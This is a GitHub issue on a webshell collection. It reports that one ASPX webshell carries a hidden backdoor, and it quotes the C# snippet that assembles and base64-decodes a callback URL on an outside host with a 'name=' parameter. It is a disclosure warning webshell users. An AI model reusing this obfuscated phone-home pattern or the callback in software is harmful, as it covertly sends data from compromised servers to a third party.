Backdoor in webshell

Here is one I found.
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L54
Variable `YfCnP` is base64 encoded.
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L39-L49
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L519-L529
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L2081
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1724
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1662
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1561
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1495
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1466
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1449
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1297
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L1179
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L589
https://github.com/xl7dev/WebShell/blob/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/Aspx/%E4%B8%93%E7%89%88aspx%E6%B1%97%E8%A1%80%E5%AE%9D%E9%A9%AC.aspx#L499
Decode `YfCnP`:
`http://www.troyplan.com/article/info/gk.aspx?name=`
Maybe there are more backdoors in webshells, use with caution.
### Don't be evil.








	string YfCnP = sh;
	YfCnP += portble;
	YfCnP += vcf;
	YfCnP += dwgtg;
	YfCnP += bin_data;
	YfCnP += fuze;
	YfCnP += ouj;
	YfCnP += tprq;
	YfCnP += idodr;
	YfCnP += mtg;
	YfCnP += ksgr;

	ksgr = Encoding.Default.GetString(Convert.FromBase64String(ksgr));
	mtg = Encoding.Default.GetString(Convert.FromBase64String(mtg));
	idodr = Encoding.Default.GetString(Convert.FromBase64String(idodr));
	tprq = Encoding.Default.GetString(Convert.FromBase64String(tprq));
	ouj = Encoding.Default.GetString(Convert.FromBase64String(ouj));
	fuze = Encoding.Default.GetString(Convert.FromBase64String(fuze));
	bin_data = Encoding.Default.GetString(Convert.FromBase64String(bin_data));
	dwgtg = Encoding.Default.GetString(Convert.FromBase64String(dwgtg));
	vcf = Encoding.Default.GetString(Convert.FromBase64String(vcf));
	portble = Encoding.Default.GetString(Convert.FromBase64String(portble));
	sh = Encoding.Default.GetString(Convert.FromBase64String(sh));

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Backdoor in webshell #1

Don't be evil.

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Backdoor in webshell #1

Description

Don't be evil.

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions